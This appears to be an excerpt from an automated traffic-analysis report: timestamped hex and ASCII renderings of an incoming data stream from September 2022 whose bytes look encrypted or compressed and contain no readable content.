                                                                                                                                                            Data Ascii: >kTc8BF.%P-Q,p"=Xm5{"t9=Q"+w~aQbr'q3<%pW80L6%t)a<yQ3cWK~nftM.?Y)YqrZn\!TQ1]UAln'|!E!sR?X<Vy/ui"P\`IR
                                                                                                                                                            2022-09-29 12:44:59 UTC4130INData Raw: a2 aa 37 1a a7 78 8d a5 c4 e9 41 72 05 b3 a8 94 89 72 bf d2 0a 42 26 14 ed f5 cb 27 93 f4 f7 a5 d5 c9 c4 b0 9f d9 d8 26 a8 da a0 b6 1b 50 04 8f 98 aa 78 38 80 1f 8e 33 02 18 92 fb 6d 8e 4f 30 97 b5 2f 0b a7 d9 67 76 f4 5a cb 0b 88 34 1e 29 aa ad f2 b5 51 da 5a 48 51 87 00 7d 4f a4 23 1c ad f8 b8 4c 2b 7b 7c f6 a3 7a 91 ec 8f 51 d4 2f 12 5a 6c 39 af f2 ea f5 20 52 fa 68 f0 25 b6 0b 9a 76 2d 2c d4 a7 2f 0c 4f 97 9f 5d a0 ff d9 6f 93 4f a9 c3 d4 39 ba 43 e2 43 f7 48 3f cb 35 79 f2 71 ec 52 57 be cf 44 47 4a 03 8f 77 10 59 49 c1 82 1b 9f 0b ff f4 3d da 4b 9e 4c b1 16 4d 54 2d 3e 67 e8 92 b2 97 29 ba dc cc 5f 2f 1c 4c e9 9e de 16 c8 fc 41 27 7a 0c 2d 80 73 73 a8 c2 d6 9b fa 5c 0c 74 76 5c 88 ec ad 46 c3 06 51 89 47 24 52 9d 1f be 9b 96 f6 0b 80 7b 06 de 99 40
                                                                                                                                                            Data Ascii: 7xArrB&'&Px83mO0/gvZ4)QZHQ}O#L+{|zQ/Zl9 Rh%v-,/O]oO9CCH?5yqRWDGJwYI=KLMT->g)_/LA'z-ss\tv\FQG$R{@
                                                                                                                                                            2022-09-29 12:44:59 UTC4131INData Raw: 17 47 91 aa 35 df 95 48 e2 3f 1c 22 59 8e ae 84 2d c4 99 90 d5 d1 01 71 c1 e0 e0 bf e9 a2 7d f2 01 25 9f 42 6e e5 0c e4 4b 61 d1 41 c8 42 55 c4 1a d7 bf bc 43 d5 f7 1f 58 16 32 9d 2c 3f c7 d8 d0 00 93 15 85 8e 5b 2e 99 fb 4c 67 39 e6 54 6b ff 33 e4 6b 67 b2 dc 8e bf b6 02 56 4c e4 4d 47 1f cf d3 40 a6 d5 11 18 0a a5 90 32 47 f5 b9 1e d4 f7 72 99 05 20 15 a9 d2 68 c9 88 61 bb 3f 38 62 5e fa 76 01 e2 5e 84 7a 7e 0a e9 1d 25 9c 68 04 fd 61 82 62 8c c2 35 26 95 69 39 e3 a8 18 73 6c 90 60 e8 1b e2 62 f6 75 0e 8c 46 b5 af 1c ca 26 20 0d 8f a5 a9 68 1a 15 96 69 32 26 4e c5 18 9e 1f 56 6b bc 36 8e bf c7 b6 e5 b5 21 47 55 ab 31 0e ab 78 f8 58 a3 ae a8 a4 52 1d d1 69 63 04 4f 50 68 2b d9 55 f8 d6 40 f4 db 7d 97 b1 32 93 95 51 47 a2 8b 94 40 98 b6 77 51 be 5b b9 5c
                                                                                                                                                            Data Ascii: G5H?"Y-q}%BnKaABUCX2,?[.Lg9Tk3kgVLMG@2Gr ha?8b^v^z~%hab5&i9sl`buF& hi2&NVk6!GU1xXRicOPh+U@}2QG@wQ[\
                                                                                                                                                            2022-09-29 12:44:59 UTC4133INData Raw: bf 4f ed 17 76 44 c7 04 26 f6 75 98 1f 82 00 1b d3 7a 4f df 2e 1e 64 5d 06 20 f2 aa d3 af 93 46 1a ed 33 fb 3f 37 fe 5a ab 04 e7 48 57 66 0b db 57 e1 9b cf cf 72 14 18 7a 3e 8d a4 6d 28 77 59 68 d8 26 a8 8e bd b9 20 7b b3 6f 6a 08 8f d9 e4 42 d9 78 9c b7 44 9a ef 53 54 69 bd ea e7 8d 54 f4 2c d7 73 80 ec c9 10 46 5e 20 0e 55 2d 4e 87 d8 21 b8 b6 c3 68 a6 fa 43 36 02 7a e2 e4 3b ce 9d 56 ce 80 0f cd 4b e7 fd 73 6a af a4 14 e6 6a ee c0 90 88 1b fb 06 bc fe 49 b5 8a e4 31 fd 7f c0 29 1e 47 7c 87 c8 ac e1 65 93 0c a6 04 6f cb b1 f8 bb c3 2f e2 a7 e8 a8 e0 3f d1 64 cd 80 32 0b 56 61 4b 62 de 4c 9e 48 87 15 05 b2 fc 97 7d bf 2c 07 8f cc bb 25 42 b9 ec d2 c8 03 ac 19 2c b0 55 ee 6f 8e dd a5 a6 b4 33 5b 22 19 09 d3 77 13 c7 40 ee b2 f8 af 38 fd 82 8a b4 01 fc c4
                                                                                                                                                            Data Ascii: OvD&uzO.d] F3?7ZHWfWrz>m(wYh& {ojBxDSTiT,sF^ U-N!hC6z;VKsjjI1)G|eo/?d2VaKbLH},%B,Uo3["w@8
                                                                                                                                                            2022-09-29 12:44:59 UTC4134INData Raw: c0 43 25 18 52 d0 6c d0 14 d5 d7 d0 91 ce e8 b1 1d 00 42 18 00 91 0f bc 62 2f 3c 2a e6 92 2e 9b a8 1b 64 65 d2 a4 68 87 c0 e5 e7 8a 43 6b 0f 6c 3f 83 3e f6 77 29 a5 98 32 0a 4b 95 0b af ca 38 08 b6 6e e8 a3 12 ab 22 c2 30 c0 20 1f 2d a2 00 74 5d 79 85 32 17 7c 5e b7 63 f6 9f 6c 60 81 fe 21 44 94 4c ca 6a b0 ec ae 34 d3 01 44 ea f4 09 51 af 92 45 ea 64 19 ba 61 07 08 ca 77 48 72 5d 03 32 c2 d2 2c 3a 4b 2f 3d 29 e1 f7 14 fc 27 2f 38 70 5a e8 13 bf e4 2b 37 d1 9e 28 7f db 51 71 9f f8 10 bd 87 fb 09 e8 55 89 b5 0e a6 33 fd 95 01 e8 fb 5f dd 33 51 85 7e e3 f1 ab 38 2d 28 69 62 bf 4f 37 98 c2 c4 fb c2 63 5f 2d 6a 1d b2 5a 0a 99 d4 1e 14 8f e1 6d 9d 58 e0 1c b2 10 99 97 a4 e1 5a e5 e0 90 79 74 b1 61 26 e5 e0 70 31 95 8c f5 5b c6 c4 e4 73 21 29 c7 03 f6 3c e7 13
                                                                                                                                                            Data Ascii: C%RlBb/<*.dehCkl?>w)2K8n"0 -t]y2|^cl`!DLj4DQEdawHr]2,:K/=)'/8pZ+7(QqU3_3Q~8-(ibO7c_-jZmXZyta&p1[s!)<
                                                                                                                                                            2022-09-29 12:44:59 UTC4135INData Raw: 87 51 21 89 d6 11 6d cb 79 45 75 40 76 16 6e f0 07 91 44 cd 9c f0 ed 25 25 f0 12 e7 0f 2b 40 f0 5b ab 96 22 21 38 09 26 cf 2c f0 5d b1 fe 24 a0 87 27 6f 71 aa a3 69 54 44 06 e6 87 2d f8 69 9f 15 18 51 ef 7a ed 8b 62 d5 ae f9 c8 53 7f 78 59 2e c7 70 bf 8e 21 d6 28 a0 2b 3d a6 75 02 04 a6 f4 45 39 93 69 4d 55 88 b6 43 8e 9f f7 91 d4 c2 e4 22 eb 0d ec 70 45 4e 0c ba ff 4a 07 d7 7e c6 0f b0 b7 c1 35 98 23 f7 a3 8e 41 82 9b d0 1d 5f 1f 1f c2 8d 55 2a 6c e9 b1 40 c1 f7 89 e0 f7 b6 0c 3e f1 50 69 66 60 0b d6 f4 c3 14 d3 33 5e 17 6f 58 d0 60 68 2e 0f e3 72 d2 1a 60 62 5b 4e 28 58 87 b5 ee d1 95 eb 97 a2 c0 bf 22 94 89 f7 e2 5d b2 c6 80 aa 6c c2 ac 16 cd 1a fd 70 95 e6 8c fb c6 a0 4d ee d3 51 b3 f1 b6 4f 6f 78 6d 4d 88 e5 34 95 f1 6d dc 81 e6 30 cf cd cc 54 c6 c7
                                                                                                                                                            Data Ascii: Q!myEu@vnD%%+@["!8&,]$'oqiTD-iQzbSxY.p!(+=uE9iMUC"pENJ~5#A_U*l@>Pif`3^oX`h.r`b[N(X"]lpMQOoxmM4m0T
                                                                                                                                                            2022-09-29 12:44:59 UTC4137INData Raw: 08 d2 fb 1a e4 cc c5 67 54 64 c7 63 41 52 fb 82 db 21 63 3a 9b 88 f9 a8 95 c4 c2 23 c7 ba 21 85 85 5c 7d 12 ba b6 2e 2e ef 8e 71 e5 c2 6a da eb 6e 26 b0 10 88 31 3e a6 fa 10 28 1c 15 f3 de ca 7a 61 f5 7a 3b 86 b3 1d f9 4f 0c d4 15 f6 af 5b 55 5f 2d 56 d4 6b 0b 1b a1 b5 a9 9a 40 bb e2 fb aa b6 da bb e8 5f b5 86 19 fb e5 0a ee ba a7 af 5a 68 b8 2f c3 b3 7e 26 95 c6 8e e1 6e 0e c7 0d 2e 5b 39 ae 1f 55 fc fb c4 1b a4 25 a8 7f 6c 3a c7 e6 b7 34 91 dc 7f 26 32 a0 44 77 66 0b 20 6f 3f c0 dd 14 9b f0 35 a4 fa 52 4e bf 1b 4d 0f b6 cc 84 b5 98 11 7a 2e 3b 79 b0 f7 b1 ed 42 e1 bf 20 9f d4 f1 ca e7 a7 a8 02 b2 a0 cb 8d c0 ed 5b be 21 39 7c ea b4 d4 79 02 e6 5d 51 59 63 69 6a a2 31 aa a3 68 ef 5e cf cc f9 8c 62 0e 39 af 05 11 9e 3c 54 46 33 05 19 b8 12 63 ed 42 f2 7a
                                                                                                                                                            Data Ascii: gTdcAR!c:#!\}..qjn&1>(zaz;O[U_-Vk@_Zh/~&n.[9U%l:4&2Dwf o?5RNMz.;yB [!9|y]QYcij1h^b9<TF3cBz
                                                                                                                                                            2022-09-29 12:44:59 UTC4138INData Raw: 03 a3 8f c7 d3 76 8f 03 20 1f e7 4e be 90 57 7a 07 33 e6 f9 b1 61 92 e8 e4 63 3d 31 df 0a 16 c9 e6 5c 97 b7 44 3c 83 9c 8f 6c 14 d4 4d 51 9d ed 00 b8 c1 05 bb 33 c9 4c 07 89 f6 fa 26 4a 49 df 17 19 76 62 d5 3c fa f7 6e 95 1e ad da 3c dd 2b 43 63 d6 5f 8c b0 bc ab e7 13 42 eb 11 51 f9 15 6a 0f e5 e6 f8 a7 05 c5 8c 69 7f b9 cf 4e 36 19 05 a5 86 09 26 cf cd 4f 21 65 2f f0 e2 07 66 1a 72 98 3d e2 bf ae 74 63 26 88 98 3f 9c 39 e6 38 ef 96 7d 1d d0 a8 48 4b 42 14 d4 d8 2c 31 6a 3a fa e9 13 a8 7c 5a 0c 2c 18 bb fc 56 d1 be 90 0a b7 e9 16 06 8a 46 fc b4 0a f2 f1 85 e3 96 16 28 b6 88 df 63 71 7e 21 9d b2 ed e6 a1 0a 79 4b 34 3d d3 b3 c9 77 11 d7 59 65 bd ea b5 88 0c 4a 42 c2 97 2d fc b6 d4 19 51 75 5f a1 e4 c3 46 23 f8 76 a7 e8 4d a1 05 0f 41 f6 46 d8 43 5b 5d d9
                                                                                                                                                            Data Ascii: v NWz3ac=1\D<lMQ3L&JIvb<n<+Cc_BQjiN6&O!e/fr=tc&?98}HKB,1j:|Z,VF(cq~!yK4=wYeJB-Qu_F#vMAFC[]
                                                                                                                                                            2022-09-29 12:44:59 UTC4139INData Raw: 1d e0 87 e7 91 db 41 98 a2 47 96 3d 69 fb 29 46 27 1b 98 e4 2e 23 d7 00 82 82 5e da 5d eb a5 31 f1 86 77 60 47 d0 c1 37 93 4b bd 33 e3 81 da bd f2 29 e4 02 cb ce 49 4a 28 13 47 21 08 94 36 c8 3a 4c 5e 3c 80 2c 1f c2 66 e8 24 14 2f 3b 6b cb 93 e4 46 fe 9a a5 17 ef d9 68 89 03 d3 f7 e6 ce 41 a2 73 8e cf bd 14 4e e0 74 70 93 4b 02 21 f1 71 b0 79 cc 7e 26 0d b3 f9 a1 a7 94 f8 f1 fa 6a 31 e7 ae f3 53 45 9a e9 f3 af a9 97 d7 f1 fe 34 38 55 14 cb 0b f2 69 7a 9e c2 f1 ed 60 b8 1b e4 d1 da 71 82 7f 44 01 b7 01 ab 58 aa 85 d6 07 e0 8d dc ac f3 22 0e 92 31 d4 72 7c 52 a0 27 b2 8d 33 38 ce 43 f6 4d e7 eb db 6a a1 a6 0e cc 5b b3 0f 5a 15 51 ee e1 f4 14 65 4b 9c 5e 2a 80 7e 21 d2 09 43 7d 75 49 c6 9f a3 fa ee 8c 88 95 ac 95 8a b4 ba a1 89 4f 1e 98 a0 3a 8d 08 71 f0 b3
                                                                                                                                                            Data Ascii: AG=i)F'.#^]1w`G7K3)IJ(G!6:L^<,f$/;kFhAsNtpK!qy~&j1SE48Uiz`qDX"1r|R'38CMj[ZQeK^*~!C}uIO:q
                                                                                                                                                            2022-09-29 12:44:59 UTC4140INData Raw: 9f 2b a6 d8 e2 4c 8d 60 44 03 5e ef ce 4d 8f 97 ca 25 f4 b8 a1 da 9c ba 2b ed 79 4f 91 02 2d 3c a4 b7 10 3f 87 d0 f1 74 c5 2d 1a 57 39 72 39 1b 92 fd d8 2d 5e 64 4a 12 55 2c 18 5f 39 05 5e 98 17 41 8d 1d 59 fa 06 a7 67 31 86 e9 ed d8 d1 a2 b2 05 94 79 57 1e 24 57 c8 d7 99 7b 28 39 74 94 44 70 5b d0 87 c1 ea b5 f1 d9 76 28 fd 10 20 29 bd 65 cc 61 b1 3b 59 00 e5 92 39 1b 6b b2 aa 7c 3c 7b 4c 0f 41 6d 9b c8 56 41 64 19 77 97 d0 7c 59 c6 16 e9 ff 51 31 c9 70 d6 eb a2 68 6e 2f 07 c8 6b e9 db c3 8a 44 66 26 1e 6f 92 e8 9e 90 10 01 ae e9 6e 08 cd 8f a3 c4 70 03 d2 72 49 e6 5e 15 c7 0a 93 1b 9e 78 21 48 d2 03 11 22 d0 ff 7e 0e 13 7f fa 01 25 7e 08 c7 74 fe cf f7 80 73 40 d0 d3 fc 92 00 12 0d 40 54 76 53 eb 3d 33 3e 68 09 72 64 43 bd b6 e9 aa 42 28 04 de 94 19 8a
                                                                                                                                                            Data Ascii: +L`D^M%+yO-<?t-W9r9-^dJU,_9^AYg1yW$W{(9tDp[v( )ea;Y9k|<{LAmVAdw|YQ1phn/kDf&onprI^x!H"~%~ts@@TvS=3>hrdCB(
                                                                                                                                                            2022-09-29 12:44:59 UTC4156INData Raw: bd fd 32 3f 86 3d f0 dd 78 89 30 04 9e 95 69 b4 dc 1a b5 4a e6 18 38 50 9f 25 a9 a2 8f 80 55 05 e6 76 64 19 d0 a3 2b a3 51 d6 31 e7 1a d6 e5 24 d0 fa 40 17 9a e0 47 d5 37 be 2f 88 19 50 52 35 4d 5c 26 0e d4 84 51 01 0a 3c 65 2b 68 0e c5 80 bf f7 e4 c7 3d fa e9 19 a9 52 65 b7 6f d1 ff c8 e2 c6 66 c2 3a e8 87 ad d4 0d dc eb ee 0c e7 1c 5c 43 2f e0 6d 29 10 38 f6 3a 0c 30 a3 e6 cb a9 6d b9 af ee 33 0b 7f 50 6c b1 df 12 ac e3 dc d0 67 a6 01 29 6e ee 1b 43 9f 6e 8d e4 18 6e 2a c6 f6 96 ea 97 1f 3e 3d ba 2a df 22 22 a5 57 a3 bc 00 bb 14 20 ec d2 6f b0 55 3a 98 1f a9 0d 6a a0 bb 7a 7c 00 28 09 60 38 84 2b 09 a1 f6 5e d7 81 d0 77 aa f2 12 80 47 af 25 53 7d 33 bd f8 0a c4 79 bc 05 81 31 bb c2 23 65 1f 7c 4f f9 2a 69 8f f7 f5 06 f4 3d c0 0b b9 00 e2 f3 ce 13 cb 1f
                                                                                                                                                            Data Ascii: 2?=x0iJ8P%Uvd+Q1$@G7/PR5M\&Q<e+h=Reof:\C/m)8:0m3Plg)nCnn*>=*""W oU:jz|(`8+^wG%S}3y1#e|O*i=
                                                                                                                                                            2022-09-29 12:44:59 UTC4172INData Raw: 1d 73 d3 c3 5f c2 9a 05 48 ba 5a 5a d4 db a8 cb 8d d0 fb 64 36 e0 21 b7 bd 83 4e 9b e8 c0 9d c7 1f 22 6e 9c 2c bc 13 d0 ac d7 5f 99 91 a3 58 af af e0 f2 84 7d e5 22 7c bd d1 c8 6c a8 6d 80 2d 62 68 5f 21 fa 66 c8 99 18 40 56 8e d9 94 ce 04 ce 3b f1 52 00 a9 12 9e 44 42 90 24 14 9e 7c 20 30 47 9f a6 b2 12 63 89 97 99 05 ce a9 76 c6 42 e7 5d a5 5d 5a 0f 47 8c 2f a4 f9 ef 3c c2 44 e7 85 e6 0f cd 89 a5 f1 25 3b 9c 76 cd 24 41 44 f0 23 98 6e 90 39 c1 5c 62 e7 89 ae b4 88 4f 62 4f ce a4 00 dd b3 06 e0 f0 04 48 46 b0 8e d4 3b c8 75 99 06 e5 26 57 9b 37 ea f7 7e 52 9e 53 8d b5 29 0e b0 25 79 9a 4c 2b 12 29 53 12 d9 6c 08 24 a9 f2 10 c8 fb 95 30 d0 8f 2f c2 d5 be 01 06 02 5c 84 9b c2 3d 86 04 11 e0 89 de dc 5e b8 ce 2f 0a d6 13 43 29 2e f9 12 26 22 32 a3 e8 f8 36
                                                                                                                                                            Data Ascii: s_HZZd6!N"n,_X}"|lm-bh_!f@V;RDB$| 0GcvB]]ZG/<D%;v$AD#n9\bObOHF;u&W7~RS)%yL+)Sl$0/\=^/C).&"26
                                                                                                                                                            2022-09-29 12:44:59 UTC4188INData Raw: 2e 54 5a ae 7b 73 61 9c 5f db 19 95 24 c5 4c 37 b5 87 c9 5a f9 94 9b 49 9c 2f 74 8a 7f a9 31 dd 72 04 bc c4 44 60 5e 9e 54 81 51 b3 8a 77 3e 48 aa a3 3a ca 15 df 81 df cf 75 3c e3 d3 51 47 0c ff c4 bc ce 74 42 a5 97 50 ef 1c 95 d2 fe 2c a5 ae 85 42 97 5b be fa bb 96 21 8a a2 60 57 87 47 d4 c0 66 ac 09 ed 92 5d c2 ee f3 2f 65 a9 06 f1 a6 a4 7e 47 34 48 39 61 29 61 03 91 50 75 9b 79 f8 8c db 69 4c cc f5 ad ff ea d4 ee f3 5f ad 1e fc 20 fd bd b1 36 88 ef 73 71 81 03 2f 3b 6d 47 fc 4b 1a 94 70 46 7c 4f ff 3c ec bf 05 6f 01 f8 dd 84 e7 6e 05 e4 cf 5f 36 2d 2b 0f 1f 97 b8 06 ec 4d f5 6e f4 d2 e4 b3 9e cb 9a 7e d4 6c b6 87 56 02 45 79 33 17 0a 49 3f 18 2a dd ec 78 56 19 1e 1d 50 1f 79 23 94 2f 0d f3 78 98 5e 7a 7e 1d 4a 54 57 15 90 46 86 d2 08 ad 77 ae 5c 21 90
                                                                                                                                                            Data Ascii: .TZ{sa_$L7ZI/t1rD`^TQw>H:u<QGtBP,B[!`WGf]/e~G4H9a)aPuyiL_ 6sq/;mGKpF|O<on_6-+Mn~lVEy3I?*xVPy#/x^z~JTWFw\!
                                                                                                                                                            2022-09-29 12:44:59 UTC4204INData Raw: 74 c3 dd 35 e5 28 0d 54 40 4e c2 d4 fd d0 92 78 d7 85 9f 06 8c 00 ef a5 1e e4 8c c6 69 ac f8 fd 23 b5 4c 22 3f 6a 08 42 2f de 1b f8 16 73 06 87 67 6f 91 e1 3e 48 bb 76 a9 a2 cf 0b 5f 11 19 85 85 ec e0 27 f0 32 7d d7 ea f2 89 18 87 e9 df 3e 64 80 c9 b6 83 a4 0a ab 0b c0 b8 f0 e4 1e 06 bf f8 75 b2 3f 8d 6f 58 32 91 dc 0b 62 ac a2 fa 5b 94 cc 01 7f c9 42 db 2e b1 0b 24 49 6d 9b cf 3f 3d c7 f9 d2 33 b2 cc 19 f0 ad c2 b2 3c 27 64 c4 80 74 3c 80 42 b2 91 8a fc a2 95 31 1d 67 7a 5c f0 c0 0d be 5b 8e 8d b0 bd 9c 03 1f 69 cd 28 8b e3 4a 87 8f ba 70 e5 19 19 37 2a 20 54 70 05 d3 d3 e3 b1 12 65 b9 50 ec 1c fc 51 cd 35 1d c1 e4 ed 96 ad fb 4e c7 d2 96 69 13 42 7a a8 e7 b8 ec 2e e5 a5 62 9f c9 23 7d b5 4a 15 f6 ab 67 e3 cc 0d 96 f3 95 46 1a 81 61 c2 1a 15 0f 65 ed ab
                                                                                                                                                            Data Ascii: t5(T@Nxi#L"?jB/sgo>Hv_'2}>du?oX2b[B.$Im?=3<'dt<B1gz\[i(Jp7* TpePQ5NiBz.b#}JgFae
                                                                                                                                                            2022-09-29 12:44:59 UTC4220INData Raw: da 59 fa 7d 54 e5 b7 f6 83 76 54 51 a1 59 de 61 3a 0e a1 9f fe a9 7a 04 92 0c 8d 1e 90 99 69 77 2a d6 cb 51 8e 90 a6 8b 10 6c 26 cb 59 1e 46 ee 4d 16 d4 25 32 59 b6 ff 4f 9e 57 57 58 47 fa bc 0b f8 1e 54 83 76 83 64 03 c1 26 1d c1 8f bb 22 df a5 9d f7 c6 ee 4f d7 bf 2f f0 a5 a1 00 d2 4e 10 56 de d1 1a 47 61 76 56 7b ac 09 73 8d 82 de 68 fa d7 2e 80 73 90 a9 3b d3 88 5f 98 fc 7e 3c ab c3 9e 44 49 f8 b1 78 d0 20 50 a7 95 d8 3d 3c 5e 7d 29 99 3a a3 be fe 0a 70 2b da 83 6a e7 a4 36 03 a5 2b 5d ad 7c 97 fd 7d 3c c5 a6 12 aa 2d 61 35 b8 6f c7 e7 7b 01 46 05 53 2b 31 27 f8 5e 0f b6 bf 1a 16 d7 ca 0e b4 e5 1b d5 da 7d 44 53 1d 47 41 90 97 b4 20 73 ce 9f e5 8d ed 02 92 85 cf a6 f3 68 1e 7d 93 d6 90 0e c2 43 92 c6 ba 03 1b a3 b8 76 60 2a c3 27 99 eb ae aa 39 fc b9
                                                                                                                                                            Data Ascii: Y}TvTQYa:ziw*Ql&YFM%2YOWWXGTvd&"O/NVGavV{sh.s;_~<DIx P=<^}):p+j6+]|}<-a5o{FS+1'^}DSGA sh}Cv`*'9
                                                                                                                                                            2022-09-29 12:44:59 UTC4236INData Raw: 14 46 35 b0 0a e9 08 27 b1 f0 d2 be 9f ba cf e1 d5 ad 7f 47 25 fd b4 b1 b1 8b 1e f2 7f 35 40 37 41 3a 77 c7 8b fc 0b 7d 97 af 97 f0 d5 df 82 81 62 76 d0 27 13 9e e9 9d ef 1c 43 5c 5c 84 ea 63 9b 6b 7c 8d dc f7 17 2e 18 5b 28 2d 33 79 5a 37 68 6e 5e 16 5d 3a f6 7c 62 c6 81 54 81 f9 0e 8c b5 f1 79 90 6e 52 a1 16 f1 6e a3 31 4c e9 cd ee 96 f7 d6 f8 ae 47 99 a2 d2 3f 45 24 3b af 32 f3 4f 31 ae 48 a9 09 16 a7 d4 6d 27 29 1b d5 4c 60 66 99 cf 0e c5 99 ab d4 96 e5 9b 6f ca 16 6f dc ad cd df 66 b9 1a 80 44 29 35 d0 2f 3b a9 9a 2c 3b f6 e7 48 2c 8c 2f c3 98 04 0c 2c ca 4b 3f fd 9e bc 70 84 4d 19 0f a9 00 dd 14 d7 9c cb 6f 72 41 67 60 95 3e c1 06 96 e7 ca 9d 4c 50 bb 31 c3 63 df 12 ad 87 e7 20 a2 c7 de 59 68 f5 47 d7 7f c8 e2 d2 0b 70 8f 7d 29 20 cb 88 d1 9e d7 1f
                                                                                                                                                            Data Ascii: F5'G%5@7A:w}bv'C\\ck|.[(-3yZ7hn^]:|bTynRn1LG?E$;2O1Hm')L`foofD)5/;,;H,/,K?pMorAg`>LP1c YhGp})
                                                                                                                                                            2022-09-29 12:44:59 UTC4252INData Raw: bf 1d f1 2f 57 61 d0 9f ce 9c 65 c9 df 40 e8 43 53 9d 6d 47 0c e7 09 ee 5e a0 5a f2 ff f5 4f 48 9b 28 52 80 fa 1c f2 08 d8 7f ac 1c bc 32 42 b8 3c 7b fc cd 1b 95 a0 f6 23 6f f8 a1 7f de 34 ad d2 d3 87 62 6a fd c7 a9 3c 22 05 2c 6a 8b c6 7b 38 7e fa ad 64 7b 7d a0 d9 0e 4b ff 06 08 7a 4e fe ae 0c a8 87 a3 36 89 e4 07 63 b6 63 be a1 1e c9 89 39 80 a2 94 07 cf 3b ad 6a d3 bb f5 32 1b a0 f0 c6 e0 c5 9b 89 8d 91 3f aa 17 12 46 4d d7 f4 24 6f f0 c9 79 f0 6a aa de d6 7a ef d3 0a c5 27 37 34 77 59 3f 7c 93 b6 c6 a7 56 fa b9 16 21 a1 bc 18 f1 d2 5e ce 32 f7 03 dc a9 1b a6 f4 4a aa 67 61 be 7e 22 0b e8 85 7f 47 a3 13 94 20 d3 c4 17 cb 68 a6 58 07 ed 0f 16 56 35 d3 ec 9c fc c7 44 91 93 5c 5f ca f8 21 b0 0f 30 b0 19 99 a4 a6 f5 eb c2 de d0 5e ed b9 ee 68 37 59 d8 0e
                                                                                                                                                            Data Ascii: /Wae@CSmG^ZOH(R2B<{#o4bj<",j{8~d{}KzN6cc9;j2?FM$oyjz'74wY?|V!^2Jga~"G hXV5D\_!0^h7Y
                                                                                                                                                            2022-09-29 12:44:59 UTC4268INData Raw: 7d e4 d3 73 21 d8 d5 d1 07 31 a9 ae d7 00 1a 8e 15 3f ba e1 9d 77 66 49 47 57 b8 15 68 90 e9 17 38 38 8f a8 90 be ec e4 4b 27 8a cb 72 d1 73 0b 81 33 ba 1c 3b 90 44 a1 07 41 7e d4 a7 d5 84 1c 01 23 fa 97 6e e1 3d 32 72 2c 43 68 49 2b 5b 35 4f ea 6d 1d 87 2b 1f a7 c9 a4 56 af 6f c5 3e 1e dc 18 25 8e 1b 8f 92 0d df eb 95 73 42 e9 f1 f5 7f 10 b0 d9 a0 a8 46 1f 7e bd 89 c6 e6 35 c6 c4 8a 31 b2 d4 44 45 0a a8 51 c6 04 99 02 1b ac 36 db 5c d3 ff 18 d2 97 2f a2 13 b5 34 06 05 ea 40 0d a3 7b ee 61 ed d4 b7 fe 3f 3d 13 37 1c e9 28 f9 69 38 74 db 35 aa 5c e4 7b ba c8 3f be c1 95 db 18 45 26 aa 28 8b 14 58 67 ed b3 2b e8 6a 92 b7 0c 30 1f 54 d9 09 22 1e 32 4f 4a 53 12 e6 ca 22 71 56 1c 33 06 f7 93 ac 80 eb 65 35 5d 65 5b 29 fe 1b c3 9b e9 fc 54 1b 28 d0 9c 53 60 95
                                                                                                                                                            Data Ascii: }s!1?wfIGWh88K'rs3;DA~#n=2r,ChI+[5Om+Vo>%sBF~51DEQ6\/4@{a?=7(i8t5\{?E&(Xg+j0T"2OJS"qV3e5]e[)T(S`
                                                                                                                                                            2022-09-29 12:44:59 UTC4284INData Raw: 6b f9 13 60 2f 27 00 ba cf a7 69 88 9d 1e e1 76 32 d9 c0 7f e6 af 3c ac f3 6f f4 f9 8c 8c 86 7a c4 99 25 8c e5 f3 93 be 2c b5 5c ba fe 91 d7 3d eb f9 61 97 13 61 e3 a0 ad 72 d9 2a 30 85 85 da 06 4d 50 61 8b 1f 03 25 42 3c b6 93 2b 18 43 0b e3 67 00 93 d3 75 6c c6 62 ad c5 c3 e6 3b 52 6a 08 20 90 f6 8a b2 14 f2 dd da 29 f6 ec 9d 8a 45 ce 33 0b 9f 61 5d b6 0d a4 1f a1 80 e1 ad 41 79 05 16 2a f7 a5 23 e0 d9 d5 52 7b ab 34 b3 d2 61 8d b3 06 c3 e4 d4 bc 2c 1d 87 f6 9e 11 43 1e 4d 3b 62 53 e9 a3 e9 71 9a e7 80 ae 59 c4 ae 36 68 a0 01 c7 83 e5 a6 ac c4 68 37 4e 5c 2e d0 d9 4e b8 ec 18 e4 72 35 86 04 de fd cf c0 e4 4c 71 c1 53 71 0b 47 e9 ff 0b ad 60 29 df 16 90 8f 5a 43 d6 40 c0 2a 38 2b 38 6d 53 d0 4c d1 03 a0 43 35 f1 82 47 08 99 6a 0c 03 0e 28 20 f0 55 a3 c2
                                                                                                                                                            Data Ascii: k`/'iv2<oz%,\=aar*0MPa%B<+Cgulb;Rj )E3a]Ay*#R{4a,CM;bSqY6hh7N\.Nr5LqSqG`)ZC@*8+8mSLC5Gj( U
                                                                                                                                                            2022-09-29 12:44:59 UTC4300INData Raw: 32 c8 d7 df df 21 00 d3 9c c9 e7 6a 22 d8 1a 3c 17 ad 26 6c 74 b4 ba ba ae b9 bd a3 7e 49 36 1c c2 bb 0b 53 c9 99 53 22 74 e7 0b 4c a7 9d ae d9 8b bc cd 25 b1 68 36 79 ad b6 31 0d af 0c 38 21 77 d9 e6 24 00 0e 6a 87 50 ba 62 a6 e9 5b fe b2 e1 00 95 b5 35 72 0c 3e e7 4e f6 80 70 70 cf 49 45 f7 93 cf 30 da 23 92 8c b4 e0 e0 15 0c c5 b4 e6 3f d9 85 a8 cb 92 f5 0f d4 72 c3 37 02 20 e5 fd cd 32 23 14 b3 e8 bf 07 37 b5 d7 f8 ed 6b da 6f 6b d0 bf e3 89 e3 85 35 69 af d5 93 23 f6 22 60 4a 06 49 12 13 c1 fd 66 2a bd 25 05 9d 8d a0 fd 99 f2 38 b8 e4 41 64 4e bd e5 df 96 25 c0 f6 2b 53 a9 7c 49 00 23 61 22 dd 15 e7 b8 b2 bb af 0c af 25 a4 2c 10 ab e1 45 7a a0 9d 99 bd c8 96 eb 28 d0 d3 67 46 29 87 48 33 f5 a0 8e 04 7f 00 4d 8b e7 72 0a a6 04 d0 4a 2e 62 bc 10 70 c9
                                                                                                                                                            Data Ascii: 2!j"<&lt~I6SS"tL%h6y18!w$jPb[5r>NppIE0#?r7 2#7kok5i#"`JIf*%8AdN%+S|I#a"%,Ez(gF)H3MrJ.bp
